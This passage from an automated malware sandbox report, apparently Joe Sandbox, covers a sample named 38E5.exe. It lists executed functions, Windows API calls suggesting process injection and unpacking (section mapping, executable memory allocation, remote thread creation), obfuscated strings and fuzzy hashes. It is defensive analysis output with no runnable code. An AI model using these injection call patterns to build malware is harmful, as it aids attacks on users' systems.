CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0274F261
Module32First.KERNEL32(00000000,00000224), ref: 0274F281

Memory Dump Source

Source File: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_273d000_haevsid.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a3f7684f4873a7fbee6c0e65249e59984d5fed249171deab2a0584f643b2db1d
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B7F096362007246BE7203BF9988CB6F76ECBF49764F501628EA52D18C0DF70E8454AA2

Function 025B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,025B0223,?,?), ref: 025B0E19
SetErrorMode.KERNELBASE(00000000,?,?,025B0223,?,?), ref: 025B0E1E

Memory Dump Source

Source File: 00000005.00000002.1970451441.00000000025B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25b0000_haevsid.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 8f6d2e30e3af7fa99cae600574b5a2077abbbd3ebbb0e80a8fe1475a88e7ad37
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 55D0123514512877D7012A94DC09BCE7F1CDF05B66F008011FB0DD9080C770954046E9

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 0274EEF8 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0274EF49

Memory Dump Source

Source File: 00000005.00000002.1970758383.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_273d000_haevsid.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 381bbfa419481ab4a74cd757a13a0871ecd0ef4d871b9e7a26d5b7eebf6458a2
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 7D110B79A00208EFDB01DF98C985E99BBF5BF08751F158094F948AB361D771EA50DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.1969478247.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_haevsid.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Analysis Process: 38E5.exePID: 4996, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	78.1%
Signature Coverage:	4.7%
Total number of Nodes:	64
Total number of Limit Nodes:	3

Executed Functions

Function 00431540 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 318
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00431C2A

Part of subcall function 0043352A: _malloc.LIBCMT ref: 00433538

__wfopen_s.LIBCMT ref: 00431C44

Part of subcall function 00433150: __indefinite.LIBCMT ref: 004349D0

__floor_pentium4.LIBCMT ref: 00431C80

Strings

aYX, xrefs: 0043169E
s6.s, xrefs: 00431693
F:, xrefs: 00431A80
=KnH, xrefs: 0043182E
&mm, xrefs: 004318F6
R`, xrefs: 00431A0B
0.txt, xrefs: 00431C3E
wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez, xrefs: 00431C1E
VD[E, xrefs: 004316F5

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: __floor_pentium4__indefinite__wfopen_s_free_malloc
String ID: F:$&mm$0.txt$=KnH$R`$VD[E$aYX$s6.s$wopeducuzecogexojinuliwutocekay fehotusafobozaheyezesorunizemozo laxuvofududogateducokuxavoxabe ganinebudez
API String ID: 3889868452-3505399015
Opcode ID: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
Instruction ID: ad96a9d43ed1917ae2a70b0bafe91b8a3833c5c9e6e88e4928b445b74cbf9755
Opcode Fuzzy Hash: d99e9b8741b22aa99d10b1caa619cc7040c5bc56d361daa6ff3a0b13eea6f9e9
Instruction Fuzzy Hash: 0A022DB5609380CFD2708F6AC589B8FF7E4BF85714F10891DE6DA5A620DB3088858F57

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 004311B0 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 263
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 00431296
LocalAlloc.KERNELBASE(00000000,00467221), ref: 004312E9
VirtualProtect.KERNELBASE(00477FF8,0047856C,00000020,?), ref: 00431367
LoadLibraryA.KERNELBASE(00449F78), ref: 00431522

Strings

W$!, xrefs: 004312C2
vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga, xrefs: 0043124E
jjj, xrefs: 0043141A
jjj, xrefs: 004313C2
gulepulawoboxejobukade, xrefs: 00431283, 0043129F
lulugumiwitojijeponuyo, xrefs: 00431427
, xrefs: 0043134D
tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy, xrefs: 00431249
{, xrefs: 00431489
kernel32.dll, xrefs: 004312F5
dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler, xrefs: 004314A9
Bq , xrefs: 004311F5
royakamexisezepucivapah, xrefs: 00431422

Memory Dump Source

Source File: 00000007.00000002.2486740120.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_40b000_38E5.jbxd

Similarity

API ID: AllocLibraryLoadLocalProtectVirtual_strlen
String ID: $Bq $W$!$dumuve kogewetolunejem hexiboj kigatuletef wibugotizeyoxemevaraler$gulepulawoboxejobukade$jjj$jjj$kernel32.dll$lulugumiwitojijeponuyo$royakamexisezepucivapah$tihofozawehuluberilepesuwezawudadelanixoboxovihoxipusoy$vokejawufikuvifofefahosinipibuhucolufacedagixiyidiligokososijuvoheyepusamudefexepiwagiga${
API String ID: 349918097-3902791245
Opcode ID: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
Instruction ID: 415c62a77951a744553a168a51a57c6a95c62745853e107deaa3f9e8edd1f5a1
Opcode Fuzzy Hash: 6b06d21b638aa7282f18eacee7887cae100392b5e156ec492f4e918b727b1bd6
Instruction Fuzzy Hash: F3A1E131940244AFE7109B61ED89FAF7B78FB89B05F10412AF645B66B0CB741884CF6D

Function 0061003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0061024D

Strings

kernel32.dll, xrefs: 0061008F, 00610095
cess, xrefs: 0061018D

Memory Dump Source

Source File: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_610000_38E5.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b40402b49297019ac0359b46df886006c9cefe6b746cbecd0bbf5e598aecbc36
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 24526874A012299FDB64CF68C985BA8BBB1BF09304F1480D9E54DAB351DB70AAC5DF14

Function 00850BF6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00850C1E
Module32First.KERNEL32(00000000,00000224), ref: 00850C3E

Memory Dump Source

Source File: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_83e000_38E5.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7e1372986b2ebc3d631bf5ac9f2c91988da63be7bc25410b64df627b2a90e1bc
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E1F062351007186FE7203BB99C8DBAB76E8FF4A766F100628EA46D51C0DA70EC498A61

Function 00610E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00610223,?,?), ref: 00610E19
SetErrorMode.KERNELBASE(00000000,?,?,00610223,?,?), ref: 00610E1E

Memory Dump Source

Source File: 00000007.00000002.2487104825.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_610000_38E5.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 649faff877baa90af5d0f76c5993c87f03ba0bdede3cca897dfd7d7f314a1141
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: FFD0123114512877DB002A95DC09BCD7B1CDF05B62F048411FB0DD9180C7B0998046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000007.00000002.2486697848.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_38E5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 008508B5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00850906

Memory Dump Source

Source File: 00000007.00000002.2487596772.000000000083E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083E000, based on PE: false

Joe Sandbox IDA Plugin

